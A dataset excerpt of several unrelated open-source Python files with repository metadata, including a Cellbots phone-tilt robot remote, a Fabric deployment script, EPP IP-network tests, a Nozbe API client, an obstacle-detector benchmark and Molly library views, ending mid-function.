to=settings.AUTH_USER_MODEL,
),
)
),
RunInPublic(
migrations.AddField(
model_name="contract",
name="worker",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="contracts",
to="company.Worker",
),
)
),
RunInPublic(
migrations.AddField(
model_name="company",
name="users",
field=models.ManyToManyField(
blank=True,
related_name="companies",
through="company.Worker",
to=settings.AUTH_USER_MODEL,
),
)
),
RunInPublic(
migrations.AlterUniqueTogether(
name="worker", unique_together={("company", "user")}
)
),
]
| 0 | 1,493 | 23 |
652e1af2d76fc8f234b10e9c9f6b44f047c6d6ce | 10,843 | py | Python | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | 2 | 2018-10-11T16:11:11.000Z | 2018-10-11T16:15:53.000Z | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | 38 | 2015-03-03T22:32:20.000Z | 2015-03-03T22:32:47.000Z | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# See http://www.cellbots.com for more information
__license__ = 'Apache License, Version 2.0'
import ConfigParser
import os
import sys
import time
from threading import Thread
import android
import math
from threadedAndroid import droid
import utils
import xmpp
# Send command out of uplink
# Send command out of the device over BlueTooth or XMPP
class CellbotRemote(Thread):
"""Cellbot remote control"""
# Give the user an option to try other actions while still using the remote as
# an accelerometer
| 37.649306 | 80 | 0.636909 | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# See http://www.cellbots.com for more information
__license__ = 'Apache License, Version 2.0'
import ConfigParser
import os
import sys
import time
from threading import Thread
import android
import math
from threadedAndroid import droid
import utils
import xmpp
class RemoteState(object):
def __init__(self):
self.running = True
self.pauseSending = False
class RemoteUplink(object):
def __init__(self, remoteUplink, state):
self.remoteUplink = remoteUplink
self.state = state
self.previousMsg = ""
self.lastMsgTime = time.time()
self.previousToastMsg = ''
self.lastToastMsgTime = 0
# Send command out of uplink
def sendCmd(self, droid, msg, override=False):
if not self.state.pauseSending or override:
try:
# Don't send the same message repeatedly unless 1 second has passed
if msg != self.previousMsg or (time.time() > self.lastMsgTime + 1000):
self.remoteUplink.sendCmd(msg)
except IOError:
self.specialToast(droid, "Failed to send command to robot")
self.previousMsg=msg
self.lastMsgTime = time.time()
# Send command out of the device over BlueTooth or XMPP
def specialToast(self, droid, msg):
try:
# Don't toast the same message repeatedly unless 5 seconds have passed
if msg != self.previousToastMsg or \
(time.time() > self.lastToastMsgTime + 5000):
droid.makeToast(msg)
except:
pass
self.previousToastMsg=msg
self.lastToastMsgTime = time.time()
class CellbotRemote(Thread):
"""Cellbot remote control"""
def __init__(self, config, uplink, sendQuit=False):
Thread.__init__(self)
self.config = config
self.state = RemoteState()
self.remoteUplink = RemoteUplink(uplink, self.state)
self.droid = droid
self.optionsThread = RemoteCommandOptions(self.remoteUplink, self.state,
sendQuit)
self.optionsThread.daemon = True
def startOptions(self):
self.optionsThread.start()
def run(self):
self.droid.startSensing()
time.sleep(1.0) # give the sensors a chance to start up
while self.state.running:
try:
sensor_result = self.droid.readSensors()
pitch=float(sensor_result.result['pitch'])
roll=float(sensor_result.result['roll'])
except TypeError:
pitch = 0
roll = 0
self.remoteUplink.specialToast(self.droid, "Failed to read sensors")
# Convert the radions returned into degrees
pitch = pitch * 57.2957795
roll = roll * 57.2957795
# Assumes the phone is flat on table for no speed ad no turning
# Translate the pitch into a speed ranging from -100 (full backward) to
# 100 (full forward).
# Also support a gutter (dead spot) in the middle and buzz the phone when
# user is out of range.
if pitch > 50:
speed = 100
self.droid.vibrate((pitch -50) * 10)
self.remoteUplink.specialToast(self.droid, "Too far forward")
elif pitch < -50:
speed = -100
self.droid.vibrate(((pitch *-1) -50) * 10)
self.remoteUplink.specialToast(self.droid, "Too far backward")
elif pitch in range(-5,5):
speed = 0
else:
# Take the pitch that range from 50 to -50 and multiply it by two and
# reverse the sign
speed = pitch * 2
# Translate the roll into a direction ranging from -100 (full left) to 100
# (full right).
# Also support a gutter (dead spot) in the middle and buzz the phone when
# user is out of range.
if roll > 50:
direction = 100
self.droid.vibrate((roll -50) * 10)
self.remoteUplink.specialToast(self.droid, "Too far left")
elif roll < -50:
direction = -100
self.droid.vibrate(((roll *-1) -50) * 10)
self.remoteUplink.specialToast(self.droid, "Too far right")
elif roll in range(-5,5):
direction = 0
else:
# Take the roll that range from 50 to -50 and multiply it by two and
# reverse the sign
direction = roll * 2
# Reverse turning when going backwards to mimic what happens when steering
# a non-differential drive system
# where direction is really a "bias" and not a true turning angle.
if speed < 0:
direction = direction * -1
# Clamp speed and direction between -100 and 100 just in case the above
# let's something slip
speed = max(min(speed, 100), -100)
direction = max(min(direction, 100), -100)
# Apply acceleration scaling factor since linear use of the accelerometer
# goes to fast with minor tilts
# Apply acceleration scaling factor since linear use of the accelerometer
# goes to fast with minor tilts
scaledSpeed = math.pow(abs(speed) / 100.00, self.config.speedScaleFactor)
speed = math.copysign(scaledSpeed, speed) * 100.00
scaledDirection = math.pow(abs(direction) / 100.00,
self.config.directionScaleFactor)
direction = math.copysign(scaledDirection, direction) * 100.00
# Okay, speed and direction are now both in the range of -100:100.
# Speed=100 means to move forward at full speed. direction=100 means
# to turn right as much as possible.
# Treat direction as the X axis, and speed as the Y axis.
# If we're driving a differential-drive robot (each wheel moving forward
# or back), then consider the left wheel as the X axis and the right
# wheel as Y.
# If we do that, then we can translate [speed,direction] into [left,right]
# by rotating by -45 degrees.
# See the writeup at
# http://code.google.com/p/cellbots/wiki/TranslatingUserControls
# This actually rotates by 45 degrees and scales by 1.414, so that full
# forward = [100,100]
right = speed - direction
left = speed + direction
# But now that we've scaled, asking for full forward + full right turn
# means the motors need to go to 141. If we're asking for > 100, scale
# back without changing the proportion of forward/turning
if abs(left) > 100 or abs(right) > 100:
scale = 1.0
# if left is bigger, use it to get the scaling amount
if abs(left) > abs(right):
scale = 100.0 / abs(left)
else:
scale = 100.0 / abs(right)
left = int(scale * left)
right = int(scale * right)
command = "ws %d %d" % (left, right)
self.remoteUplink.sendCmd(self.droid, command)
time.sleep(0.25)
sys.exit()
# Give the user an option to try other actions while still using the remote as
# an accelerometer
class RemoteCommandOptions(Thread):
kCardinals = {
'North': '0', 'East': '90', 'West': '270', 'South': '180'
}
def __init__ (self, remoteUplink, remoteState, sendQuit=False):
""" Initialize remote command options thread.
This handles the remote control menu, displays menu, get user input, send
commands.
Args:
remoteUplink: RemoteUplink object.
remoteState: RemoteState object, shared with CellbotRemote object.
sendQuit: If true, send quit command on exit.
"""
Thread.__init__(self)
self.remoteUplink = remoteUplink
self.state = remoteState
self.droid = droid
self.unlocked_droid = android.Android()
self.sendQuit = sendQuit
def run(self):
command = ''
msg = ''
while command != "Exit":
try:
command = utils.pickFromList(self.unlocked_droid,
"Pick an action (set down phone to pause)",
['Say Hello', 'Point Using Compass', 'Take Picture',
'Speak Location', 'Voice Command','Exit'])
except KeyError as e:
msg = "Sorry, please try that again. %s" % str(e)
self.droid.makeToast(msg)
else:
# Pause sending commands so that robot only does what user selected here
self.state.pauseSending = True
if command == "Take Picture":
self.remoteUplink.sendCmd(self.droid, "picture", True)
self.droid.ttsSpeak("Asking robot to take a picture")
self.droid.makeToast("Please wait, this may take a few seconds")
time.sleep(5)
msg = "Picture should be taken by now"
elif command == "Speak Location":
msg = "Speaking location"
self.remoteUplink.sendCmd(self.droid, "x", True)
elif command == "Voice Command":
try:
voiceCommand = droid.recognizeSpeech().result
self.remoteUplink.sendCmd(self.droid, voiceCommand, True)
msg = "Told the robot to " + voiceCommand
self.droid.makeToast(msg)
time.sleep(2)
except:
msg = "Could not understand"
elif command == "Point Using Compass":
msg = "This feature is currently not available on the robot."
self.droid.makeToast(msg)
# try:
# direction = utils.pickFromList(self.unlocked_droid,
# "Pick a direction", sorted([c for c in self.kCardinals]))
# except KeyError as e:
# msg = "Sorry, please try that again. %s" % str(e)
# self.droid.makeToast(msg)
# else:
# self.droid.ttsSpeak("Selected direction %s." % direction)
# cmd = "p " + self.kCardinals[direction]
# self.remoteUplink.sendCmd(self.droid, cmd, True)
# msg = "Asking robot to point " + direction
# self.droid.ttsSpeak(msg)
# time.sleep(2)
# msg = "Robot should be facing " + direction
elif command == "Say Hello":
msg = "Asking robot to say hello"
self.remoteUplink.sendCmd(self.droid, "hi", True)
elif command == "Exit":
msg = "Bye bye. Come again."
if self.sendQuit:
self.remoteUplink.sendCmd(self.droid, "q", True)
self.droid.ttsSpeak(msg)
time.sleep(1)
# This resumes sending of normal accelerometer stream of commands
self.state.pauseSending = False
self.remoteUplink.sendCmd(self.droid, "ws 0 0", True)
# This will exit the main loop as well. Remove this if you only want to exit
# the pop-up menu.
self.state.running = False
| 8,826 | 719 | 239 |
de4b2a6933b3aa5e5ae0ced88de5b8ddb6b75250 | 4,802 | py | Python | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | from fabric.api import *
from fabric.contrib.files import *
from path import path as ppath
app = env.app = {
'live_catalogue-repo': 'https://svn.eionet.europa.eu/repositories/Python/flis.live_catalogue',
'localrepo': ppath(__file__).abspath().parent.parent,
}
try: from localcfg import *
except: pass
app.update({
'instance_var': app['repo']/'instance',
'manage_var': app['repo']/'live_catalogue',
'live_catalogue_var': app['repo']/'live_catalogue'/'live_catalogue',
'sandbox': app['repo']/'sandbox',
'user': 'edw',
})
@task
@task
@task
@task
@task
@task
| 36.105263 | 104 | 0.636818 | from fabric.api import *
from fabric.contrib.files import *
from path import path as ppath
app = env.app = {
'live_catalogue-repo': 'https://svn.eionet.europa.eu/repositories/Python/flis.live_catalogue',
'localrepo': ppath(__file__).abspath().parent.parent,
}
try: from localcfg import *
except: pass
app.update({
'instance_var': app['repo']/'instance',
'manage_var': app['repo']/'live_catalogue',
'live_catalogue_var': app['repo']/'live_catalogue'/'live_catalogue',
'sandbox': app['repo']/'sandbox',
'user': 'edw',
})
@task
def ssh():
open_shell("cd '%(repo)s'" % app)
def _install_random_key(remote_path, key_length=20, mode=0600):
import random
import string
from StringIO import StringIO
vocabulary = string.ascii_letters + string.digits
key = ''.join(random.choice(vocabulary) for c in xrange(key_length))
put(StringIO(key), remote_path, mode=mode)
def _svn_repo(repo_path, origin_url, update=True):
if not exists(repo_path/'.svn'):
run("mkdir -p '%s'" % repo_path)
with cd(repo_path):
run("svn co '%s' ." % origin_url)
elif update:
with cd(repo_path):
run("svn up")
@task
def install_live_catalogue():
_svn_repo(app['repo'], app['live_catalogue-repo'], update=True)
if not exists(app['sandbox']):
run("virtualenv --distribute '%(sandbox)s'" % app)
run("%(sandbox)s/bin/pip install -r %(repo)s/requirements.txt" % app)
if not exists(app['manage_var']/'media'):
run("mkdir -p '%(manage_var)s/media'" % app)
if not exists(app['instance_var']):
run("mkdir -p '%(instance_var)s'" % app)
if not exists(app['instance_var']/'files'):
run("mkdir -p '%(instance_var)s/files'" % app)
secret_key_path = app['instance_var']/'secret_key.txt'
if not exists(secret_key_path):
_install_random_key(str(secret_key_path))
#put(app['localrepo']/'fabfile'/'production-settings.py',
# str(app['live_catalogue_var']/'local_settings.py'))
upload_template(app['localrepo']/'fabfile'/'supervisord.conf',
str(app['sandbox']/'supervisord.conf'),
context=app, backup=False)
run("%s/bin/python %s/manage.py syncdb" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py migrate" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_categories" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_flis_topics" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_themes" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py collectstatic --noinput" % (app['sandbox'], app['manage_var']))
@task
def live_catalogue_supervisor():
run("'%(sandbox)s/bin/supervisord'" % {
'sandbox': app['sandbox'],
})
@task
def update_live_catalogue():
_svn_repo(app['repo'], app['live_catalogue-repo'], update=True)
if not exists(app['sandbox']):
run("virtualenv --distribute '%(sandbox)s'" % app)
run("%(sandbox)s/bin/pip install -r %(repo)s/requirements.txt" % app)
if not exists(app['manage_var']/'media'):
run("mkdir -p '%(manage_var)s/media'" % app)
if not exists(app['instance_var']):
run("mkdir -p '%(instance_var)s'" % app)
if not exists(app['instance_var']/'files'):
run("mkdir -p '%(instance_var)s/files'" % app)
#put(app['localrepo']/'fabfile'/'production-settings.py',
# str(app['live_catalogue_var']/'local_settings.py'))
upload_template(app['localrepo']/'fabfile'/'supervisord.conf',
str(app['sandbox']/'supervisord.conf'),
context=app, backup=False)
run("%s/bin/python %s/manage.py syncdb" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py migrate" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_categories" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_flis_topics" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py loaddata initial_themes" % (app['sandbox'], app['manage_var']))
run("%s/bin/python %s/manage.py collectstatic --noinput" % (app['sandbox'], app['manage_var']))
execute('service_live_catalogue', 'restart')
@task
def service_live_catalogue(action):
run("'%(sandbox)s/bin/supervisorctl' %(action)s %(name)s" % {
'sandbox': app['sandbox'],
'action': action,
'name': 'live_catalogue',
})
@task
def deploy_live_catalogue():
execute('install_live_catalogue')
execute('live_catalogue_supervisor')
execute('service_live_catalogue', 'restart')
| 4,027 | 0 | 178 |
33f3d29ca81d488b9b1fa12a199928dd2f994a1a | 1,643 | py | Python | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | import pytest
from eppy.doc import EppResponse
from lxml import etree
from registrobrepp.ipnetwork.brtransferipnetworkcommand import BrEppTransferIpNetworkCommand
| 42.128205 | 136 | 0.712112 | import pytest
from eppy.doc import EppResponse
from lxml import etree
from registrobrepp.ipnetwork.brtransferipnetworkcommand import BrEppTransferIpNetworkCommand
class TestBrTransferIpNetworkCommand:
@pytest.fixture
def ipnetworkcommand(self):
roid = 'b_12345-LACNIC'
command = BrEppTransferIpNetworkCommand('request', roid)
command.add_clTRID('ABC-12345')
return command
def test_transfer_request_ipnetwork_command(self, ipnetworkcommand, ipnetworkxmlschema, transferrequestipnetworkcommandxmlexpected):
xml = ipnetworkcommand.to_xml(force_prefix=True).decode()
assert ipnetworkxmlschema.validate(etree.fromstring(xml))
assert xml == transferrequestipnetworkcommandxmlexpected
def test_check_ipnetwork_response(self, responsetransferipnetworkcommandxmlexpected):
response = EppResponse.from_xml(responsetransferipnetworkcommandxmlexpected, extra_nsmap={
'ipnetwork': 'urn:ietf:params:xml:ns:ipnetwork-1.0'
})
xml = response.to_xml(force_prefix=True).decode()
data = response['epp']['response']['resData']['ipnetwork:trnData']
assert data.roid == 'b_12345-LACNIC'
assert data.trStatus == 'pending'
assert data.reID == 'ClientX'
assert data.reDate == '2000-06-08T22:00:00.0Z'
assert data.acID == 'ClientY'
assert data.acDate == '2000-06-13T22:00:00.0Z'
assert response['epp']['response']['trID']['clTRID'] == 'ABC-12345'
assert response['epp']['response']['trID']['svTRID'] == '54322-XYZ'
assert xml == responsetransferipnetworkcommandxmlexpected
| 1,338 | 117 | 23 |
d1b656c61ecb335fbfba74450b82a969d9671697 | 2,858 | py | Python | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | 2 | 2017-03-13T22:37:35.000Z | 2019-07-29T00:19:43.000Z | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | null | null | null | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | 2 | 2018-02-18T08:23:36.000Z | 2018-09-03T12:10:49.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Mariusz Sielicki <mariusz.sielicki@gmail.com>
import logging
import requests
log = logging.getLogger("nozbe")
| 30.731183 | 83 | 0.584325 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Mariusz Sielicki <mariusz.sielicki@gmail.com>
import logging
import requests
log = logging.getLogger("nozbe")
class Nozbe(object):
API_URL = 'https://webapp.nozbe.com/api'
API_KEY = None
SESSION = None
ACTIONS = ('projects', 'contexts', 'newproject', 'actions', 'newaction')
def __init__(self, api_key, username=None, password=None):
if api_key is not None:
self.API_KEY = api_key
if self.SESSION is None:
self.SESSION = requests.Session()
def _prepare_url(self, action, *args, **kwargs):
if action not in self.ACTIONS:
log.error('Unsupported action: %s', action)
raise AttributeError
url = [self.API_URL, action]
if args:
url.append(*args)
if kwargs:
url.append('/'.join(['{}-{}'.format(k, v) for k, v in kwargs.items()]))
url.append('key-{}'.format(self.API_KEY))
return '/'.join(url)
def _fetch(self, url):
log.info('Request for url: %s', url)
res = self.SESSION.get(url)
try:
ret = res.json()
except ValueError:
log.debug('Request for url: %s', url)
ret = []
return ret
def get_projects(self):
url = self._prepare_url('projects')
return self._fetch(url)
def get_project_by_name(self, name):
for project in self.get_projects():
if name == project['name']:
return project
def get_project_by_id(self, project_id):
for project in self.get_projects():
if project_id == project['id']:
return project
def get_project_tasks(self, id=None, name=None):
if id is not None:
project_id = id
elif name is not None:
project = self.get_project_by_name(name)
project_id = project['id']
else:
log.error('Project id or name must be provided')
raise AttributeError
url = self._prepare_url('actions', what='project', id=project_id)
return self._fetch(url)
def get_contexts(self):
url = self._prepare_url('contexts')
return self._fetch(url)
def create_project(self, name, force=False):
if not force:
projects = self.get_projects()
if name in [i['name'] for i in projects]:
log.warn('Project with name "%s" already exists.', name)
return projects
url = self._prepare_url('newproject', name=name)
self._fetch(url)
return self.get_projects()
def create_project_task(self, name, project_id):
url = self._prepare_url('newaction', name=name, project_id=project_id)
self._fetch(url)
return self.get_project_tasks(project_id)
| 2,238 | 429 | 23 |
7b6ee7f219bb40fd9c0b27109e5cf02b92963deb | 2,866 | py | Python | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 12 | 2019-10-10T22:17:45.000Z | 2021-09-14T23:54:02.000Z | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 178 | 2019-10-29T16:28:02.000Z | 2021-07-26T17:15:31.000Z | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 6 | 2019-10-09T00:20:27.000Z | 2021-09-28T00:24:00.000Z | """
Utility to measure performance of obstacle detector.
Parameter Defaults
------------------
Resolution = (1280, 720)
Noise SD = 0
N Objects = 0
Type = circle
Radius = 100
"""
import os, sys
parent_dir = os.path.dirname(os.path.abspath(__file__))
gparent_dir = os.path.dirname(parent_dir)
ggparent_dir = os.path.dirname(gparent_dir)
gggparent_dir = os.path.dirname(ggparent_dir)
sys.path += [parent_dir, gparent_dir, ggparent_dir, gggparent_dir]
import json
import numpy as np
import cv2
import common
from vision.obstacle.obstacle_finder import ObstacleFinder
from vision.common.import_params import import_params
class TimeObstacle:
"""
Timing ObstacleFinder methods.
"""
DEFAULT_DIMS = (1280, 720)
DEFAULT_RADIUS = 100
def setup(self):
"""
Configure blob detector and initialize images.
"""
## Generate images
self.PARAMETERS = {}
self.PARAMETERS.update(common.blank_dimensions())
base_color, base_depth = common.blank_dimensions(self.DEFAULT_DIMS)
#
for radius in [25, 50, 100, 250]:
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
cv2.circle(color_image, (640, 360), radius, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), radius, (255), thickness=-1)
self.PARAMETERS.update({f'radius={radius}': (color_image, depth_image)})
# One to each corner
for n_obj in range(4):
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
for location in [(320, 180), (320, 540), (960, 180), (960, 540)][:n_obj]:
cv2.circle(color_image, location, self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, location, self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'n_obj={n_obj}': (color_image, depth_image)})
# On default noise specturm
for title, (color_image, depth_image) in common.noise().items():
cv2.circle(color_image, (640, 360), self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'{title} single': (color_image, depth_image)})
## Read current params & setup obstacle detector
prefix = '' if os.path.isdir("times") else '..'
config_filename = os.path.join(prefix, '..', 'obstacle', 'config.json')
with open(config_filename, 'r') as config_file:
config = json.load(config_file)
self.blob_finder = ObstacleFinder(params=import_params(config))
def time_find(self, color_image, depth_image):
"""
Time the ObstacleFinder.find function.
"""
self.blob_finder.find(color_image, depth_image)
| 32.568182 | 101 | 0.647244 | """
Utility to measure performance of obstacle detector.
Parameter Defaults
------------------
Resolution = (1280, 720)
Noise SD = 0
N Objects = 0
Type = circle
Radius = 100
"""
import os, sys
parent_dir = os.path.dirname(os.path.abspath(__file__))
gparent_dir = os.path.dirname(parent_dir)
ggparent_dir = os.path.dirname(gparent_dir)
gggparent_dir = os.path.dirname(ggparent_dir)
sys.path += [parent_dir, gparent_dir, ggparent_dir, gggparent_dir]
import json
import numpy as np
import cv2
import common
from vision.obstacle.obstacle_finder import ObstacleFinder
from vision.common.import_params import import_params
class TimeObstacle:
"""
Timing ObstacleFinder methods.
"""
DEFAULT_DIMS = (1280, 720)
DEFAULT_RADIUS = 100
def setup(self):
"""
Configure blob detector and initialize images.
"""
## Generate images
self.PARAMETERS = {}
self.PARAMETERS.update(common.blank_dimensions())
base_color, base_depth = common.blank_dimensions(self.DEFAULT_DIMS)
#
for radius in [25, 50, 100, 250]:
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
cv2.circle(color_image, (640, 360), radius, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), radius, (255), thickness=-1)
self.PARAMETERS.update({f'radius={radius}': (color_image, depth_image)})
# One to each corner
for n_obj in range(4):
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
for location in [(320, 180), (320, 540), (960, 180), (960, 540)][:n_obj]:
cv2.circle(color_image, location, self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, location, self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'n_obj={n_obj}': (color_image, depth_image)})
# On default noise specturm
for title, (color_image, depth_image) in common.noise().items():
cv2.circle(color_image, (640, 360), self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'{title} single': (color_image, depth_image)})
## Read current params & setup obstacle detector
prefix = '' if os.path.isdir("times") else '..'
config_filename = os.path.join(prefix, '..', 'obstacle', 'config.json')
with open(config_filename, 'r') as config_file:
config = json.load(config_file)
self.blob_finder = ObstacleFinder(params=import_params(config))
def time_find(self, color_image, depth_image):
"""
Time the ObstacleFinder.find function.
"""
self.blob_finder.find(color_image, depth_image)
| 0 | 0 | 0 |
8f1e732615d84da880b410262631235f8839a656 | 8,469 | py | Python | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | 7 | 2015-05-16T13:27:21.000Z | 2019-08-06T11:09:24.000Z | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | null | null | null | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | 4 | 2015-11-27T13:36:36.000Z | 2021-03-09T17:55:53.000Z | from datetime import timedelta
from django.core.paginator import Paginator
from django.http import Http404
from django.utils.translation import ugettext as _
from molly.utils import haversine
from molly.utils.views import BaseView, ZoomableView
from molly.utils.breadcrumbs import *
from molly.maps import Map
from molly.apps.library.forms import SearchForm
from molly.apps.library.models import LibrarySearchQuery, LibrarySearchError
class IndexView(BaseView):
"""
Index page of the library app
"""
@BreadcrumbFactory
class SearchDetailView(BaseView):
"""
Search results page
"""
@BreadcrumbFactory
AVAIL_COLORS = ['red', 'amber', 'purple', 'blue', 'green']
class ItemDetailView(ZoomableView):
"""
More detail about the item page
"""
@BreadcrumbFactory
class ItemHoldingsView(ZoomableView):
"""
Specific details of holdings of a particular item
"""
@BreadcrumbFactory
| 33.741036 | 97 | 0.58106 | from datetime import timedelta
from django.core.paginator import Paginator
from django.http import Http404
from django.utils.translation import ugettext as _
from molly.utils import haversine
from molly.utils.views import BaseView, ZoomableView
from molly.utils.breadcrumbs import *
from molly.maps import Map
from molly.apps.library.forms import SearchForm
from molly.apps.library.models import LibrarySearchQuery, LibrarySearchError
class IndexView(BaseView):
"""
Index page of the library app
"""
def get_metadata(self, request):
return {
'title': _('Library search'),
'additional': _("View libraries' contact information and find library items."),
}
def initial_context(self, request):
return {
'search_form': SearchForm()
}
@BreadcrumbFactory
def breadcrumb(self, request, context):
return Breadcrumb(self.conf.local_name, None, _('Library search'), lazy_reverse('index'))
def handle_GET(self, request, context):
return self.render(request, context, 'library/index',
expires=timedelta(days=28))
class SearchDetailView(BaseView):
"""
Search results page
"""
def get_metadata(self, request):
return {
'show_in_results': False,
}
def initial_context(self, request):
return {
'search_form': SearchForm(request.GET),
}
@BreadcrumbFactory
def breadcrumb(self, request, context):
if 'item' in context or context['search_form'].is_valid():
title = _('Search Results')
else:
title = _('Library search')
return Breadcrumb(
self.conf.local_name,
lazy_parent('index'),
title,
lazy_reverse('search'),
)
def handle_GET(self, request, context):
search_form = context['search_form']
if not (request.GET and search_form.is_valid()):
# No form data received
return self.render(request, context, 'library/item_list')
# Build a query object to pass to providers here
try:
query = LibrarySearchQuery(
search_form.cleaned_data['title'],
search_form.cleaned_data['author'],
search_form.cleaned_data['isbn']
)
except LibrarySearchQuery.InconsistentQuery, e:
return self.handle_error(request, context, e.msg)
# Call provider
try:
results = self.conf.provider.library_search(query)
except LibrarySearchError as e:
return self.handle_error(request, context, e.message)
# Paginate results
paginator = Paginator(results, 10)
try:
page_index = int(request.GET['page'])
except (ValueError, KeyError):
page_index = 1
else:
page_index = min(max(1, page_index), paginator.num_pages)
page = paginator.page(page_index)
# Add cover image
if hasattr(self.conf, 'additional_metadata_provider'):
self.conf.additional_metadata_provider.annotate(page.object_list)
# Without this, the object_list doesn't render when using fragment
# rendering...
page.object_list = list(page.object_list)
# Render results page
context.update({
'removed': query.removed,
'results': paginator,
'page': page,
})
return self.render(request, context, 'library/item_list',
expires=timedelta(hours=1))
def handle_error(self, request, context, message):
context['error_message'] = message
return self.render(request, context, 'library/item_list')
AVAIL_COLORS = ['red', 'amber', 'purple', 'blue', 'green']
class ItemDetailView(ZoomableView):
"""
More detail about the item page
"""
def initial_context(self, request, control_number):
context = super(ItemDetailView, self).initial_context(request)
item = self.conf.provider.control_number_search(control_number)
if item is None:
raise Http404()
context.update({
'item': item,
'control_number': control_number,
})
return context
@BreadcrumbFactory
def breadcrumb(self, request, context, control_number):
return Breadcrumb(
self.conf.local_name,
lazy_parent('search'),
_('Search result'),
lazy_reverse('item-detail', args=[control_number]),
)
def handle_GET(self, request, context, control_number):
# Build a map of all the libraries that have this book, with markers
# corresponding to colours
user_location = request.session.get('geolocation:location')
points = []
point_libraries = []
lbs = context['item'].libraries.items()
for library, books in lbs:
library.entity = library.get_entity()
if user_location:
